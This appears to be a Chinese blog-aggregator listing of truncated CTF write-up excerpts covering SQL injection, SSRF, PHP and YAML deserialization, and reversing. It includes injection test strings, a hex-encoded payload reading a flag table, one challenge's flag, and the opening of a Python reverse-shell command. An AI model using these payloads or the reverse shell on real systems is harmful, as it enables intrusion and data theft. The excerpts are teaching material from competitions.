MISC签到题八道网络安全选择题,百度都能搜索到答案,这里如果只知道部分题目答案,可以通过枚举测试fuzz答案,获得flag flag:flag{a236b34b-8040-4ea5-9e1c-97169aa3f43a}REre693直接下载附件用golang打开看main函数可以发现会打印两句话,要求输入有六个参数并且第三个为gLIhR 的函数、被调用三次并且会调用到cHZ
这道题目登录之后我们可以看到有join和login login即登录,jo
原创 2022-09-29 22:19:26
79阅读
​ 知识点:sql注入 ssrf php反序列化漏洞打开测试环境 页面有login和join两个按钮,一个是登录页面,一个是注册页面,首先进行注册。 添加用户名密码,进行注册 点击提交,注册成果,页面跳转 点击test用户民,成果登录,并发现url中有参数no,猜测可能存在sql注入。 输入​​'​​进行测试,发现页面报错,报错信息如下图,此处存在数字型注入,且页面爆出了网站目录【/var/www
转载 2021-07-23 11:06:00
550阅读
2评论
打开链接,出现login和join两个按钮,分别是登录和注册 login尝试一下发现无法登录 进入join进行注册 其中blog输入其它字符无法注册 在首页中,发现username可以点击进入 url的格式为?no=1,可能是SQL注入 判断注入点类型 no=1 and 1=1 #回显正确 no=1 ...
转载 2021-08-08 22:55:00
236阅读
2评论
# [2018]Unfinish 0x01.前言 过滤了,分割时使用from 1 for 10绕过 0'+hex编码要读取的信息+'0 要进行二次编码一次编码会被截断 解法1 payload:0'+(select substr(hex(hex((select * from flag))) f ...
转载 2021-10-01 14:00:00
1299阅读
2评论
注册账号登录,找到view.php存在get注入。 ?no=1 and 1=2 #报错 ?no=1 and 1=1 #正常说明存在注入点。 order by 判断列数为4。 尝试联合查询 ?no=-1 union select 1,2,3,4# 检测到入侵,看来有过滤。 ?no=-1 union # ...
转载 2021-08-16 13:37:00
161阅读
2评论
web1–yaml的反序列化前言7月底强出了一道python的pickle反序列化,现在8月底又出了python的yaml反序列化,现在借此机会,自己再总结总结。当然自己在后面的时间里也要不断努力,学到更多的东西。题目import os import re import yaml import time import socket import subprocess from hashl
文章目录[ 202
原创 2022-11-17 05:58:03
346阅读
sql注入、ssrf漏洞和php反序列化漏洞的结合 关键点在于robots.txt泄露源码,然后进行反序列化。 参考:https://blog.csdn.net/qq_42196196/article/details/81952174 ...
转载 2021-07-30 09:24:00
91阅读
2评论
# Java编程入门指南 ## 前言 欢迎阅读本文,本文将为大家介绍如何使用Java语言进行编程。作为一门非常流行的编程语言,Java具有很强的跨平台性和易学易用的特点,适合初学者入门。 ## Java简介 Java是一种面向对象的编程语言,由Sun Microsystems公司于1995年发布。它的特点包括跨平台、高性能、安全性高等。使用Java可以开发各种类型的应用程序,包括企业级应用
原创 2024-06-25 04:37:17
49阅读
还没到入职时间都要长蘑菇了,刷刷题吧 打开题目就是源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $co ...
转载 2021-07-12 15:39:00
495阅读
2评论
传送门:[ 2020 青龙组]jocker 不会做呜呜,看了别人 wp 才做出来的,求师傅带带 无壳,扔进 IDA,f5 发现不能反编译,原因是堆栈不平衡,先进行栈指针修改 options->general->勾选stack pointer 快捷键 alt+k,在 call 的位置修改值改为 ...
转载 2021-08-28 17:44:00
554阅读
2评论
[ 2020 白虎组]PicDown 知识点: ../../../../../proc/self/cmdline读取当前进程执行命令 /proc/self/fd/读取进程打开的每一个文件的链接 使用python反弹shell: python -c "import os,socket,subpr ...
转载 2021-06-18 23:38:00
744阅读
2评论
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct( ...
转载 2021-08-21 23:34:00
187阅读
2评论
直接给出源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __con ...
转载 2021-08-13 13:53:00
251阅读
抓包 看到网页post提交了两个参数,打开hackbar发现确实传了值。 怀疑func是函数名,参数p是函数的参数值。 猜测后台可能是调用了call_user_func()方法。 这么传入看一下func=eval&p=<?php phpinfo()?>试一下 看来后台还是有过滤的。 读取一下inde ...
转载 2021-08-20 14:41:00
226阅读
[ 2020 朱雀组]phpweb 打开环境就看到一行报错 好像是时间设置的有问题,尝试抓包解决,发现post数据里有两个参数 瞎搞了一会没啥突破,也不知道这里面到底是啥意思,上网寻求帮助,最后看到有一个博主说,看到这两个参数,会想到一个是函数名,另一个是要传的参数,这里很有可能是用了*cal ...
转载 2021-10-29 20:28:00
476阅读
2评论
[ 2020 青龙组]AreUSerialz 解 读题 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected ...
转载 2021-08-08 00:21:00
623阅读
2评论
[ 2020 青龙组]AreUSerialz <?php include("flag.php"); highlight_file(__FILE__); class FileH
原创 2022-09-23 16:01:58
179阅读
0x01 开局一张图一看就知道让我们代码审计对于这种一长串的源码,还是逐步来解把首先的解题思路就是查看CTF题目的命名和代码函数CTF题目这里命名为​​AreUSerialz​​,我反正一眼看不出什么端详,打的CTF比较少,直接看函数名字在下面可以看到有一个​​unserialize()​​函数,那这一题基本上就是考反序列化的知识了。我们整体的浏览一边代码,来看一下程序的大概走向。include(
原创 精选 2022-05-26 10:04:38
752阅读
  • 1
  • 2
  • 3
  • 4
  • 5